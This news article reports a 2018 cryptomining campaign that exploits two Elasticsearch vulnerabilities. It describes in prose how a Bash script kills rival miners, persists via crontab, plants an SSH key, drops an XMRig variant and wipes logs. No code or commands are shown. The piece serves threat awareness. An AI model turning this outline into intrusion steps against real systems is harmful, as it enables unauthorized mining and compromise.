Actors pivot to other network devices from infected machines

Dec 12, 2018 21:34 GMT  ·  By

A malware campaign scanning the Internet for exploitable Elasticsearch instances running on Linux machines has been recently observed by Trend Micro and by ISC, in both cases dropping a variant of the XMRig cryptocurrency miner.

"The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch," said Trend Micro.

After the attackers gain the ability to run arbitrary commands on the compromised systems, they can "attempt to escalate the privileges or even pivot to other systems in order to compromise the network further."

Following successful exploitation of the vulnerabilities, the malware will execute a number of shell commands and will download and launch a Bash script named update.sh which will hunt down and kill other miners running on the local system.

Next, the script will achieve persistence by adding itself to the system's crontab to be run every 10 minutes, while first resetting it so that the miners killed in the previous step will not be started again.

An XMRig variant is used to mine for crypto on compromised machines

The malicious Bash script will also add its SSH public key to the .authorized_keys file to be able to late log into the system without having to use a username/password combo. However, in a twisted turn of fate or programming error, the script will subsequently remove the .authorized_keys file.

To finalize the infection procedure, the script downloads the devtools binary (an XMRig coin miner variant) and the config.json file containing the cryptocurrency miner's configuration, while also wiping out all the logs when done to remove any traces of its presence.

Moreover, the crypto miner was previously identified on other endpoints from all over the world, with locations ranging from China and Taiwan to the United States.

"Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before," concluded Trend Micro.

Photo Gallery (4 Images)

Malicious coin miner campaign
Coin miner configuration fileEliminating other existing miners
+1more